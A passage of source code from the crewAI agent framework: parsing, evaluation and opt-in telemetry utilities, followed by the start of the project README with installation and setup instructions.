"".join([self.i18n.slice("task"), self.SCRATCHPAD_SLICE]), ) response = response_template.split("{{ .Response }}")[0] prompt = PromptTemplate.from_template(f"{system}\n{prompt}\n{response}") return prompt File: src/crewai/utilities/parser.py import re class YamlParser: @staticmethod def parse(file): """ Parses a YAML file, modifies specific patterns, and checks for unsupported 'context' usage. Args: file (file object): The YAML file to parse. Returns: str: The modified content of the YAML file. Raises: ValueError: If 'context:' is used incorrectly. """ content = file.read() # Replace single { and } with doubled ones, while leaving already doubled ones intact and the other special characters {# and {% modified_content = re.sub(r"(?<!\{){(?!\{)(?!\#)(?!\%)", "{{", content) modified_content = re.sub( r"(?<!\})(?<!\%)(?<!\#)\}(?!})", "}}", modified_content ) # Check for 'context:' not followed by '[' and raise an error if re.search(r"context:(?!\s*\[)", modified_content): raise ValueError( "Context is currently only supported in code when creating a task. " "Please use the 'context' key in the task configuration." ) return modified_content File: src/crewai/utilities/crew_json_encoder.py from datetime import datetime import json from uuid import UUID from pydantic import BaseModel class CrewJSONEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, BaseModel): return self._handle_pydantic_model(obj) elif isinstance(obj, UUID): return str(obj) elif isinstance(obj, datetime): return obj.isoformat() return super().default(obj) def _handle_pydantic_model(self, obj): try: data = obj.model_dump() # Remove circular references for key, value in data.items(): if isinstance(value, BaseModel): data[key] = str( value ) # Convert nested models to string representation return data except RecursionError: return str( obj ) # Fall back to string representation if circular reference is detected File: src/crewai/utilities/token_counter_callback.py from typing import Any, Dict, List import tiktoken from langchain.callbacks.base import BaseCallbackHandler from langchain.schema import LLMResult from crewai.agents.agent_builder.utilities.base_token_process import TokenProcess class TokenCalcHandler(BaseCallbackHandler): model_name: str = "" token_cost_process: TokenProcess encoding: tiktoken.Encoding def __init__(self, model_name, token_cost_process): self.model_name = model_name self.token_cost_process = token_cost_process try: self.encoding = tiktoken.encoding_for_model(self.model_name) except KeyError: self.encoding = tiktoken.get_encoding("cl100k_base") def on_llm_start( self, serialized: Dict[str, Any], prompts: List[str], **kwargs: Any ) -> None: if self.token_cost_process is None: return for prompt in prompts: self.token_cost_process.sum_prompt_tokens(len(self.encoding.encode(prompt))) async def on_llm_new_token(self, token: str, **kwargs) -> None: self.token_cost_process.sum_completion_tokens(1) def on_llm_end(self, response: LLMResult, **kwargs: Any) -> None: self.token_cost_process.sum_successful_requests(1) File: src/crewai/utilities/i18n.py import json import os from typing import Dict, Optional from pydantic import BaseModel, Field, PrivateAttr, model_validator class I18N(BaseModel): _prompts: Dict[str, Dict[str, str]] = PrivateAttr() prompt_file: Optional[str] = Field( default=None, description="Path to the prompt_file file to load", ) @model_validator(mode="after") def load_prompts(self) -> "I18N": """Load prompts from a JSON file.""" try: if self.prompt_file: with open(self.prompt_file, 
"r") as f: self._prompts = json.load(f) else: dir_path = os.path.dirname(os.path.realpath(__file__)) prompts_path = os.path.join(dir_path, "../translations/en.json") with open(prompts_path, "r") as f: self._prompts = json.load(f) except FileNotFoundError: raise Exception(f"Prompt file '{self.prompt_file}' not found.") except json.JSONDecodeError: raise Exception("Error decoding JSON from the prompts file.") if not self._prompts: self._prompts = {} return self def slice(self, slice: str) -> str: return self.retrieve("slices", slice) def errors(self, error: str) -> str: return self.retrieve("errors", error) def tools(self, error: str) -> str: return self.retrieve("tools", error) def retrieve(self, kind, key) -> str: try: return self._prompts[kind][key] except Exception as _: raise Exception(f"Prompt for '{kind}':'{key}' not found.") File: src/crewai/utilities/crew_pydantic_output_parser.py import json from typing import Any, List, Type import regex from langchain.output_parsers import PydanticOutputParser from langchain_core.exceptions import OutputParserException from langchain_core.outputs import Generation from pydantic import BaseModel, ValidationError class CrewPydanticOutputParser(PydanticOutputParser): """Parses the text into pydantic models""" pydantic_object: Type[BaseModel] def parse_result(self, result: List[Generation]) -> Any: result[0].text = self._transform_in_valid_json(result[0].text) # Treating edge case of function calling llm returning the name instead of tool_name json_object = json.loads(result[0].text) if "tool_name" not in json_object: json_object["tool_name"] = json_object.get("name", "") result[0].text = json.dumps(json_object) try: return self.pydantic_object.model_validate(json_object) except ValidationError as e: name = self.pydantic_object.__name__ msg = f"Failed to parse {name} from completion {json_object}. 
Got: {e}" raise OutputParserException(msg, llm_output=json_object) def _transform_in_valid_json(self, text) -> str: text = text.replace("```", "").replace("json", "") json_pattern = r"\{(?:[^{}]|(?R))*\}" matches = regex.finditer(json_pattern, text) for match in matches: try: # Attempt to parse the matched string as JSON json_obj = json.loads(match.group()) # Return the first successfully parsed JSON object json_obj = json.dumps(json_obj) return str(json_obj) except json.JSONDecodeError: # If parsing fails, skip to the next match continue return text File: src/crewai/utilities/task_output_storage_handler.py from pydantic import BaseModel, Field from datetime import datetime from typing import Dict, Any, Optional, List from crewai.memory.storage.kickoff_task_outputs_storage import ( KickoffTaskOutputsSQLiteStorage, ) from crewai.task import Task class ExecutionLog(BaseModel): task_id: str expected_output: Optional[str] = None output: Dict[str, Any] timestamp: datetime = Field(default_factory=datetime.now) task_index: int inputs: Dict[str, Any] = Field(default_factory=dict) was_replayed: bool = False def __getitem__(self, key: str) -> Any: return getattr(self, key) class TaskOutputStorageHandler: def __init__(self) -> None: self.storage = KickoffTaskOutputsSQLiteStorage() def update(self, task_index: int, log: Dict[str, Any]): saved_outputs = self.load() if saved_outputs is None: raise ValueError("Logs cannot be None") if log.get("was_replayed", False): replayed = { "task_id": str(log["task"].id), "expected_output": log["task"].expected_output, "output": log["output"], "was_replayed": log["was_replayed"], "inputs": log["inputs"], } self.storage.update( task_index, **replayed, ) else: self.storage.add(**log) def add( self, task: Task, output: Dict[str, Any], task_index: int, inputs: Dict[str, Any] = {}, was_replayed: bool = False, ): self.storage.add(task, output, task_index, was_replayed, inputs) def reset(self): self.storage.delete_all() def load(self) -> Optional[List[Dict[str, Any]]]: return self.storage.load() File: src/crewai/utilities/printer.py class Printer: def print(self, content: str, color: str): if color == "purple": self._print_purple(content) elif color == "red": self._print_red(content) elif color == "bold_green": self._print_bold_green(content) elif color == "bold_purple": self._print_bold_purple(content) elif color == "bold_blue": self._print_bold_blue(content) elif color == "yellow": self._print_yellow(content) else: print(content) def _print_bold_purple(self, content): print("\033[1m\033[95m {}\033[00m".format(content)) def _print_bold_green(self, content): print("\033[1m\033[92m {}\033[00m".format(content)) def _print_purple(self, content): print("\033[95m {}\033[00m".format(content)) def _print_red(self, content): print("\033[91m {}\033[00m".format(content)) def _print_bold_blue(self, content): print("\033[1m\033[94m {}\033[00m".format(content)) def _print_yellow(self, content): print("\033[93m {}\033[00m".format(content)) File: src/crewai/utilities/exceptions/context_window_exceeding_exception.py class LLMContextLengthExceededException(Exception): CONTEXT_LIMIT_ERRORS = [ "maximum context length", "context length exceeded", "context_length_exceeded", "context window full", "too many tokens", "input is too long", "exceeds token limit", ] def __init__(self, error_message: str): self.original_error_message = error_message super().__init__(self._get_error_message(error_message)) def _is_context_limit_error(self, error_message: str) -> bool: return any( phrase.lower() in 
error_message.lower() for phrase in self.CONTEXT_LIMIT_ERRORS ) def _get_error_message(self, error_message: str): return ( f"LLM context length exceeded. Original error: {error_message}\n" "Consider using a smaller input or implementing a text splitting strategy." ) File: src/crewai/utilities/evaluators/task_evaluator.py import os from typing import List from langchain_openai import ChatOpenAI from pydantic import BaseModel, Field from crewai.utilities import Converter from crewai.utilities.pydantic_schema_parser import PydanticSchemaParser def mock_agent_ops_provider(): def track_agent(*args, **kwargs): def noop(f): return f return noop return track_agent agentops = None if os.environ.get("AGENTOPS_API_KEY"): try: from agentops import track_agent except ImportError: track_agent = mock_agent_ops_provider() else: track_agent = mock_agent_ops_provider() class Entity(BaseModel): name: str = Field(description="The name of the entity.") type: str = Field(description="The type of the entity.") description: str = Field(description="Description of the entity.") relationships: List[str] = Field(description="Relationships of the entity.") class TaskEvaluation(BaseModel): suggestions: List[str] = Field( description="Suggestions to improve future similar tasks." ) quality: float = Field( description="A score from 0 to 10 evaluating on completion, quality, and overall performance, all taking into account the task description, expected output, and the result of the task." ) entities: List[Entity] = Field( description="Entities extracted from the task output." ) class TrainingTaskEvaluation(BaseModel): suggestions: List[str] = Field( description="Based on the Human Feedbacks and the comparison between Initial Outputs and Improved outputs provide action items based on human_feedback for future tasks." ) quality: float = Field( description="A score from 0 to 10 evaluating on completion, quality, and overall performance from the improved output to the initial output based on the human feedback." ) final_summary: str = Field( description="A step by step action items to improve the next Agent based on the human-feedback and improved output." ) @track_agent(name="Task Evaluator") class TaskEvaluator: def __init__(self, original_agent): self.llm = original_agent.llm def evaluate(self, task, output) -> TaskEvaluation: evaluation_query = ( f"Assess the quality of the task completed based on the description, expected output, and actual results.\n\n" f"Task Description:\n{task.description}\n\n" f"Expected Output:\n{task.expected_output}\n\n" f"Actual Output:\n{output}\n\n" "Please provide:\n" "- Bullet points suggestions to improve future similar tasks\n" "- A score from 0 to 10 evaluating on completion, quality, and overall performance" "- Entities extracted from the task output, if any, their type, description, and relationships" ) instructions = "Convert all responses into valid JSON output." 
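        # When the LLM is not an OpenAI GPT model (see `_is_gpt` below), the
        # Converter cannot rely on function calling, so the JSON schema derived
        # from the TaskEvaluation model is appended to the instructions to steer
        # the model toward parseable JSON output.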
if not self._is_gpt(self.llm): model_schema = PydanticSchemaParser(model=TaskEvaluation).get_schema() instructions = f"{instructions}\n\nReturn only valid JSON with the following schema:\n```json\n{model_schema}\n```" converter = Converter( llm=self.llm, text=evaluation_query, model=TaskEvaluation, instructions=instructions, ) return converter.to_pydantic() def _is_gpt(self, llm) -> bool: return isinstance(llm, ChatOpenAI) and llm.openai_api_base is None def evaluate_training_data( self, training_data: dict, agent_id: str ) -> TrainingTaskEvaluation: """ Evaluate the training data based on the llm output, human feedback, and improved output. Parameters: - training_data (dict): The training data to be evaluated. - agent_id (str): The ID of the agent. """ output_training_data = training_data[agent_id] final_aggregated_data = "" for _, data in output_training_data.items(): final_aggregated_data += ( f"Initial Output:\n{data['initial_output']}\n\n" f"Human Feedback:\n{data['human_feedback']}\n\n" f"Improved Output:\n{data['improved_output']}\n\n" ) evaluation_query = ( "Assess the quality of the training data based on the llm output, human feedback , and llm output improved result.\n\n" f"{final_aggregated_data}" "Please provide:\n" "- Based on the Human Feedbacks and the comparison between Initial Outputs and Improved outputs provide action items based on human_feedback for future tasks\n" "- A score from 0 to 10 evaluating on completion, quality, and overall performance from the improved output to the initial output based on the human feedback\n" ) instructions = "I'm gonna convert this raw text into valid JSON." if not self._is_gpt(self.llm): model_schema = PydanticSchemaParser( model=TrainingTaskEvaluation ).get_schema() instructions = f"{instructions}\n\nThe json should have the following structure, with the following keys:\n{model_schema}" converter = Converter( llm=self.llm, text=evaluation_query, model=TrainingTaskEvaluation, instructions=instructions, ) pydantic_result = converter.to_pydantic() return pydantic_result File: src/crewai/utilities/evaluators/crew_evaluator_handler.py from collections import defaultdict from crewai.agent import Agent from crewai.task import Task from crewai.tasks.task_output import TaskOutput from crewai.telemetry import Telemetry from langchain_openai import ChatOpenAI from pydantic import BaseModel, Field from rich.box import HEAVY_EDGE from rich.console import Console from rich.table import Table class TaskEvaluationPydanticOutput(BaseModel): quality: float = Field( description="A score from 1 to 10 evaluating on completion, quality, and overall performance from the task_description and task_expected_output to the actual Task Output." ) class CrewEvaluator: """ A class to evaluate the performance of the agents in the crew based on the tasks they have performed. Attributes: crew (Crew): The crew of agents to evaluate. openai_model_name (str): The model to use for evaluating the performance of the agents (for now ONLY OpenAI accepted). tasks_scores (defaultdict): A dictionary to store the scores of the agents for each task. iteration (int): The current iteration of the evaluation. 
""" tasks_scores: defaultdict = defaultdict(list) run_execution_times: defaultdict = defaultdict(list) iteration: int = 0 def __init__(self, crew, openai_model_name: str): self.crew = crew self.openai_model_name = openai_model_name self._telemetry = Telemetry() self._setup_for_evaluating() def _setup_for_evaluating(self) -> None: """Sets up the crew for evaluating.""" for task in self.crew.tasks: task.callback = self.evaluate def _evaluator_agent(self): return Agent( role="Task Execution Evaluator", goal=( "Your goal is to evaluate the performance of the agents in the crew based on the tasks they have performed using score from 1 to 10 evaluating on completion, quality, and overall performance." ), backstory="Evaluator agent for crew evaluation with precise capabilities to evaluate the performance of the agents in the crew based on the tasks they have performed", verbose=False, llm=ChatOpenAI(model=self.openai_model_name), ) def _evaluation_task( self, evaluator_agent: Agent, task_to_evaluate: Task, task_output: str ) -> Task: return Task( description=( "Based on the task description and the expected output, compare and evaluate the performance of the agents in the crew based on the Task Output they have performed using score from 1 to 10 evaluating on completion, quality, and overall performance." f"task_description: {task_to_evaluate.description} " f"task_expected_output: {task_to_evaluate.expected_output} " f"agent: {task_to_evaluate.agent.role if task_to_evaluate.agent else None} " f"agent_goal: {task_to_evaluate.agent.goal if task_to_evaluate.agent else None} " f"Task Output: {task_output}" ), expected_output="Evaluation Score from 1 to 10 based on the performance of the agents on the tasks", agent=evaluator_agent, output_pydantic=TaskEvaluationPydanticOutput, ) def set_iteration(self, iteration: int) -> None: self.iteration = iteration def print_crew_evaluation_result(self) -> None: """ Prints the evaluation result of the crew in a table. A Crew with 2 tasks using the command crewai test -n 3 will output the following table: Tasks Scores (1-10 Higher is better) ┏━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ ┃ Tasks/Crew/Agents ┃ Run 1 ┃ Run 2 ┃ Run 3 ┃ Avg. Total ┃ Agents ┃ ┡━━━━━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩ │ Task 1 │ 9.0 │ 10.0 │ 9.0 │ 9.3 │ - AI LLMs Senior Researcher │ │ │ │ │ │ │ - AI LLMs Reporting Analyst │ │ │ │ │ │ │ │ │ Task 2 │ 9.0 │ 9.0 │ 9.0 │ 9.0 │ - AI LLMs Senior Researcher │ │ │ │ │ │ │ - AI LLMs Reporting Analyst │ │ │ │ │ │ │ │ │ Crew │ 9.0 │ 9.5 │ 9.0 │ 9.2 │ │ │ Execution Time (s) │ 42 │ 79 │ 52 │ 57 │ │ └────────────────────┴───────┴───────┴───────┴────────────┴──────────────────────────────┘ """ task_averages = [ sum(scores) / len(scores) for scores in zip(*self.tasks_scores.values()) ] crew_average = sum(task_averages) / len(task_averages) table = Table(title="Tasks Scores \n (1-10 Higher is better)", box=HEAVY_EDGE) table.add_column("Tasks/Crew/Agents", style="cyan") for run in range(1, len(self.tasks_scores) + 1): table.add_column(f"Run {run}", justify="center") table.add_column("Avg. 
Total", justify="center") table.add_column("Agents", style="green") for task_index, task in enumerate(self.crew.tasks): task_scores = [ self.tasks_scores[run][task_index] for run in range(1, len(self.tasks_scores) + 1) ] avg_score = task_averages[task_index] agents = list(task.processed_by_agents) # Add the task row with the first agent table.add_row( f"Task {task_index + 1}", *[f"{score:.1f}" for score in task_scores], f"{avg_score:.1f}", f"- {agents[0]}" if agents else "", ) # Add rows for additional agents for agent in agents[1:]: table.add_row("", "", "", "", "", f"- {agent}") # Add a blank separator row if it's not the last task if task_index < len(self.crew.tasks) - 1: table.add_row("", "", "", "", "", "") # Add Crew and Execution Time rows crew_scores = [ sum(self.tasks_scores[run]) / len(self.tasks_scores[run]) for run in range(1, len(self.tasks_scores) + 1) ] table.add_row( "Crew", *[f"{score:.2f}" for score in crew_scores], f"{crew_average:.1f}", "", ) run_exec_times = [ int(sum(tasks_exec_times)) for _, tasks_exec_times in self.run_execution_times.items() ] execution_time_avg = int(sum(run_exec_times) / len(run_exec_times)) table.add_row( "Execution Time (s)", *map(str, run_exec_times), f"{execution_time_avg}", "" ) console = Console() console.print(table) def evaluate(self, task_output: TaskOutput): """Evaluates the performance of the agents in the crew based on the tasks they have performed.""" current_task = None for task in self.crew.tasks: if task.description == task_output.description: current_task = task break if not current_task or not task_output: raise ValueError( "Task to evaluate and task output are required for evaluation" ) evaluator_agent = self._evaluator_agent() evaluation_task = self._evaluation_task( evaluator_agent, current_task, task_output.raw ) evaluation_result = evaluation_task.execute_sync() if isinstance(evaluation_result.pydantic, TaskEvaluationPydanticOutput): self._test_result_span = self._telemetry.individual_test_result_span( self.crew, evaluation_result.pydantic.quality, current_task._execution_time, self.openai_model_name, ) self.tasks_scores[self.iteration].append(evaluation_result.pydantic.quality) self.run_execution_times[self.iteration].append( current_task._execution_time ) else: raise ValueError("Evaluation result is not in the expected format") File: src/crewai/telemetry/__init__.py from .telemetry import Telemetry __all__ = ["Telemetry"] File: src/crewai/telemetry/telemetry.py from __future__ import annotations import asyncio import json import os import platform from typing import TYPE_CHECKING, Any, Optional import pkg_resources from opentelemetry import trace from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter from opentelemetry.sdk.resources import SERVICE_NAME, Resource from opentelemetry.sdk.trace import TracerProvider from opentelemetry.sdk.trace.export import BatchSpanProcessor from opentelemetry.trace import Span, Status, StatusCode if TYPE_CHECKING: from crewai.crew import Crew from crewai.task import Task class Telemetry: """A class to handle anonymous telemetry for the crewai package. The data being collected is for development purpose, all data is anonymous. There is NO data being collected on the prompts, tasks descriptions agents backstories or goals nor responses or any data that is being processed by the agents, nor any secrets and env vars. Users can opt-in to sharing more complete data using the `share_crew` attribute in the Crew class. 
""" def __init__(self): self.ready = False self.trace_set = False try: telemetry_endpoint = "https://telemetry.crewai.com:4319" self.resource = Resource( attributes={SERVICE_NAME: "crewAI-telemetry"}, ) self.provider = TracerProvider(resource=self.resource) processor = BatchSpanProcessor( OTLPSpanExporter( endpoint=f"{telemetry_endpoint}/v1/traces", timeout=30, ) ) self.provider.add_span_processor(processor) self.ready = True except BaseException as e: if isinstance( e, (SystemExit, KeyboardInterrupt, GeneratorExit, asyncio.CancelledError), ): raise # Re-raise the exception to not interfere with system signals self.ready = False def set_tracer(self): if self.ready and not self.trace_set: try: trace.set_tracer_provider(self.provider) self.trace_set = True except Exception: self.ready = False self.trace_set = False def crew_creation(self, crew: Crew, inputs: dict[str, Any] | None): """Records the creation of a crew.""" if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Crew Created") self._add_attribute( span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute(span, "python_version", platform.python_version()) self._add_attribute(span, "crew_key", crew.key) self._add_attribute(span, "crew_id", str(crew.id)) self._add_attribute(span, "crew_process", crew.process) self._add_attribute(span, "crew_memory", crew.memory) self._add_attribute(span, "crew_number_of_tasks", len(crew.tasks)) self._add_attribute(span, "crew_number_of_agents", len(crew.agents)) if crew.share_crew: self._add_attribute( span, "crew_agents", json.dumps( [ { "key": agent.key, "id": str(agent.id), "role": agent.role, "goal": agent.goal, "backstory": agent.backstory, "verbose?": agent.verbose, "max_iter": agent.max_iter, "max_rpm": agent.max_rpm, "i18n": agent.i18n.prompt_file, "function_calling_llm": json.dumps( self._safe_llm_attributes( agent.function_calling_llm ) ), "llm": json.dumps( self._safe_llm_attributes(agent.llm) ), "delegation_enabled?": agent.allow_delegation, "allow_code_execution?": agent.allow_code_execution, "max_retry_limit": agent.max_retry_limit, "tools_names": [ tool.name.casefold() for tool in agent.tools or [] ], } for agent in crew.agents ] ), ) self._add_attribute( span, "crew_tasks", json.dumps( [ { "key": task.key, "id": str(task.id), "description": task.description, "expected_output": task.expected_output, "async_execution?": task.async_execution, "human_input?": task.human_input, "agent_role": task.agent.role if task.agent else "None", "agent_key": task.agent.key if task.agent else None, "context": ( [task.description for task in task.context] if task.context else None ), "tools_names": [ tool.name.casefold() for tool in task.tools or [] ], } for task in crew.tasks ] ), ) self._add_attribute(span, "platform", platform.platform()) self._add_attribute(span, "platform_release", platform.release()) self._add_attribute(span, "platform_system", platform.system()) self._add_attribute(span, "platform_version", platform.version()) self._add_attribute(span, "cpus", os.cpu_count()) self._add_attribute( span, "crew_inputs", json.dumps(inputs) if inputs else None ) else: self._add_attribute( span, "crew_agents", json.dumps( [ { "key": agent.key, "id": str(agent.id), "role": agent.role, "verbose?": agent.verbose, "max_iter": agent.max_iter, "max_rpm": agent.max_rpm, "function_calling_llm": json.dumps( self._safe_llm_attributes( agent.function_calling_llm ) ), "llm": json.dumps( self._safe_llm_attributes(agent.llm) ), 
"delegation_enabled?": agent.allow_delegation, "allow_code_execution?": agent.allow_code_execution, "max_retry_limit": agent.max_retry_limit, "tools_names": [ tool.name.casefold() for tool in agent.tools or [] ], } for agent in crew.agents ] ), ) self._add_attribute( span, "crew_tasks", json.dumps( [ { "key": task.key, "id": str(task.id), "async_execution?": task.async_execution, "human_input?": task.human_input, "agent_role": task.agent.role if task.agent else "None", "agent_key": task.agent.key if task.agent else None, "tools_names": [ tool.name.casefold() for tool in task.tools or [] ], } for task in crew.tasks ] ), ) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def task_started(self, crew: Crew, task: Task) -> Span | None: """Records task started in a crew.""" if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") created_span = tracer.start_span("Task Created") self._add_attribute(created_span, "crew_key", crew.key) self._add_attribute(created_span, "crew_id", str(crew.id)) self._add_attribute(created_span, "task_key", task.key) self._add_attribute(created_span, "task_id", str(task.id)) if crew.share_crew: self._add_attribute( created_span, "formatted_description", task.description ) self._add_attribute( created_span, "formatted_expected_output", task.expected_output ) created_span.set_status(Status(StatusCode.OK)) created_span.end() span = tracer.start_span("Task Execution") self._add_attribute(span, "crew_key", crew.key) self._add_attribute(span, "crew_id", str(crew.id)) self._add_attribute(span, "task_key", task.key) self._add_attribute(span, "task_id", str(task.id)) if crew.share_crew: self._add_attribute(span, "formatted_description", task.description) self._add_attribute( span, "formatted_expected_output", task.expected_output ) return span except Exception: pass return None def task_ended(self, span: Span, task: Task, crew: Crew): """Records task execution in a crew.""" if self.ready: try: if crew.share_crew: self._add_attribute( span, "task_output", task.output.raw if task.output else "", ) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def tool_repeated_usage(self, llm: Any, tool_name: str, attempts: int): """Records the repeated usage 'error' of a tool by an agent.""" if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Tool Repeated Usage") self._add_attribute( span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute(span, "tool_name", tool_name) self._add_attribute(span, "attempts", attempts) if llm: self._add_attribute( span, "llm", json.dumps(self._safe_llm_attributes(llm)) ) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def tool_usage(self, llm: Any, tool_name: str, attempts: int): """Records the usage of a tool by an agent.""" if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Tool Usage") self._add_attribute( span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute(span, "tool_name", tool_name) self._add_attribute(span, "attempts", attempts) if llm: self._add_attribute( span, "llm", json.dumps(self._safe_llm_attributes(llm)) ) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def tool_usage_error(self, llm: Any): """Records the usage of a tool by an agent.""" if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Tool Usage Error") self._add_attribute( span, 
"crewai_version", pkg_resources.get_distribution("crewai").version, ) if llm: self._add_attribute( span, "llm", json.dumps(self._safe_llm_attributes(llm)) ) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def individual_test_result_span( self, crew: Crew, quality: float, exec_time: int, model_name: str ): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Crew Individual Test Result") self._add_attribute( span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute(span, "crew_key", crew.key) self._add_attribute(span, "crew_id", str(crew.id)) self._add_attribute(span, "quality", str(quality)) self._add_attribute(span, "exec_time", str(exec_time)) self._add_attribute(span, "model_name", model_name) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def test_execution_span( self, crew: Crew, iterations: int, inputs: dict[str, Any] | None, model_name: str, ): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Crew Test Execution") self._add_attribute( span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute(span, "crew_key", crew.key) self._add_attribute(span, "crew_id", str(crew.id)) self._add_attribute(span, "iterations", str(iterations)) self._add_attribute(span, "model_name", model_name) if crew.share_crew: self._add_attribute( span, "inputs", json.dumps(inputs) if inputs else None ) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def deploy_signup_error_span(self): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Deploy Signup Error") span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def start_deployment_span(self, uuid: Optional[str] = None): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Start Deployment") if uuid: self._add_attribute(span, "uuid", uuid) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def create_crew_deployment_span(self): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Create Crew Deployment") span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def get_crew_logs_span(self, uuid: Optional[str], log_type: str = "deployment"): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Get Crew Logs") self._add_attribute(span, "log_type", log_type) if uuid: self._add_attribute(span, "uuid", uuid) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def remove_crew_span(self, uuid: Optional[str] = None): if self.ready: try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Remove Crew") if uuid: self._add_attribute(span, "uuid", uuid) span.set_status(Status(StatusCode.OK)) span.end() except Exception: pass def crew_execution_span(self, crew: Crew, inputs: dict[str, Any] | None): """Records the complete execution of a crew. This is only collected if the user has opted-in to share the crew. 
""" self.crew_creation(crew, inputs) if (self.ready) and (crew.share_crew): try: tracer = trace.get_tracer("crewai.telemetry") span = tracer.start_span("Crew Execution") self._add_attribute( span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute(span, "crew_key", crew.key) self._add_attribute(span, "crew_id", str(crew.id)) self._add_attribute( span, "crew_inputs", json.dumps(inputs) if inputs else None ) self._add_attribute( span, "crew_agents", json.dumps( [ { "key": agent.key, "id": str(agent.id), "role": agent.role, "goal": agent.goal, "backstory": agent.backstory, "verbose?": agent.verbose, "max_iter": agent.max_iter, "max_rpm": agent.max_rpm, "i18n": agent.i18n.prompt_file, "llm": json.dumps(self._safe_llm_attributes(agent.llm)), "delegation_enabled?": agent.allow_delegation, "tools_names": [ tool.name.casefold() for tool in agent.tools or [] ], } for agent in crew.agents ] ), ) self._add_attribute( span, "crew_tasks", json.dumps( [ { "id": str(task.id), "description": task.description, "expected_output": task.expected_output, "async_execution?": task.async_execution, "human_input?": task.human_input, "agent_role": task.agent.role if task.agent else "None", "agent_key": task.agent.key if task.agent else None, "context": ( [task.description for task in task.context] if task.context else None ), "tools_names": [ tool.name.casefold() for tool in task.tools or [] ], } for task in crew.tasks ] ), ) return span except Exception: pass def end_crew(self, crew, final_string_output): if (self.ready) and (crew.share_crew): try: self._add_attribute( crew._execution_span, "crewai_version", pkg_resources.get_distribution("crewai").version, ) self._add_attribute( crew._execution_span, "crew_output", final_string_output ) self._add_attribute( crew._execution_span, "crew_tasks_output", json.dumps( [ { "id": str(task.id), "description": task.description, "output": task.output.raw_output, } for task in crew.tasks ] ), ) crew._execution_span.set_status(Status(StatusCode.OK)) crew._execution_span.end() except Exception: pass def _add_attribute(self, span, key, value): """Add an attribute to a span.""" try: return span.set_attribute(key, value) except Exception: pass def _safe_llm_attributes(self, llm): attributes = ["name", "model_name", "model", "top_k", "temperature"] if llm: safe_attributes = {k: v for k, v in vars(llm).items() if k in attributes} safe_attributes["class"] = llm.__class__.__name__ return safe_attributes return {}
<div align="center"> ![Logo of crewAI, two people rowing on a boat](./docs/crewai_logo.png) # **crewAI** 🤖 **crewAI**: Cutting-edge framework for orchestrating role-playing, autonomous AI agents. By fostering collaborative intelligence, CrewAI empowers agents to work together seamlessly, tackling complex tasks. <h3> [Homepage](https://www.crewai.com/) | [Documentation](https://docs.crewai.com/) | [Chat with Docs](https://chatg.pt/DWjSBZn) | [Examples](https://github.com/crewAIInc/crewAI-examples) | [Discourse](https://community.crewai.com) </h3> [![GitHub Repo stars](https://img.shields.io/github/stars/joaomdmoura/crewAI)](https://github.com/crewAIInc/crewAI) [![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](https://opensource.org/licenses/MIT) </div> ## Table of contents - [Why CrewAI?](#why-crewai) - [Getting Started](#getting-started) - [Key Features](#key-features) - [Examples](#examples) - [Quick Tutorial](#quick-tutorial) - [Write Job Descriptions](#write-job-descriptions) - [Trip Planner](#trip-planner) - [Stock Analysis](#stock-analysis) - [Connecting Your Crew to a Model](#connecting-your-crew-to-a-model) - [How CrewAI Compares](#how-crewai-compares) - [Contribution](#contribution) - [Telemetry](#telemetry) - [License](#license) ## Why CrewAI? The power of AI collaboration has too much to offer. CrewAI is designed to enable AI agents to assume roles, share goals, and operate in a cohesive unit - much like a well-oiled crew. Whether you're building a smart assistant platform, an automated customer service ensemble, or a multi-agent research team, CrewAI provides the backbone for sophisticated multi-agent interactions. ## Getting Started To get started with CrewAI, follow these simple steps: ### 1. Installation ```shell pip install crewai ``` If you want to install the 'crewai' package along with its optional features that include additional tools for agents, you can do so by using the following command: pip install 'crewai[tools]'. This command installs the basic package and also adds extra components which require more dependencies to function." ```shell pip install 'crewai[tools]' ``` ### 2. Setting Up Your Crew ```python import os from crewai import Agent, Task, Crew, Process from crewai_tools import SerperDevTool os.environ["OPENAI_API_KEY"] = "YOUR_API_KEY" os.environ["SERPER_API_KEY"] = "Your Key" # serper.dev API key # You can choose to use a local model through Ollama for example. See https://docs.crewai.com/how-to/LLM-Connections/ for more information. # 